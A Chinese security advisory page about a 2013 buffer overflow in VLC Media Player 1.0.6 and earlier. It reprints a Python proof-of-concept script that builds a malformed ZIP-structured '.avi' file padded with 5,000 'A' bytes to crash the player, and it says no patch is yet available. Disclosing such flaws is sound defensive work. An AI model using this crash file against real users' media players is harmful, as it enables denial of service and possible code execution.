当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

VLC Media Player多个媒体文件格式缓冲区溢出漏洞

信息来源:Dr_IDE      发表日期:2013-06-01 14:24:00

VLC Media Player是多媒体播放器。

VLC media player 1.0.6及其他版本存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。

BUGTRAQ-ID:40428

受影响系统:

VideoLAN VLC Media Player 1.x

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python

 

######################################################################################################

#

# VLC Media Player <=1.0.6 Malformed Media File Crash PoC

# Found By: Dr_IDE

# Tested:   Windows 7, Ubuntu 9, OSX 10.6.X

# Download: http://www.videolan.org

# Notes:    Register overwrites seem very unpredictable at best...

# Greets:   Offsec and Corelan Teams

#

######################################################################################################

 

ldf_header = ("\\x50\\x4B\\x03\\x04\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00"

"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00")

 

cdf_header = ("\\x50\\x4B\\x01\\x02\\x14\\x00\\x14\\x00\\x00\\x00\\x00\\x00\\xB7\\xAC\\xCE\\x34\\x00\\x00\\x00"

"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe4\\x0f\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x24\\x00\\x00"

"\\x00\\x00\\x00\\x00\\x00")

 

eofcdf_header = ("\\x50\\x4B\\x05\\x06\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00"

"\\x12\\x10\\x00\\x00\\x02\\x10\\x00\\x00\\x00\\x00")

 

filename = "VLC_Doesnt_Like_Videos_That_Are_Really_Zip_Files.AVI"

 

exploit = filename

exploit += "\\x41" * 5000

 

print "[+] Writing file"

 

file = open(\'boom.avi\',\'w\'); #Anything here works, mpg, mp4, asf, mov etc...

file.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header);

file.close()

 

print "[+] Exploit file created!!"

解决办法:

厂商补丁:

 

VideoLAN

--------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.videolan.org/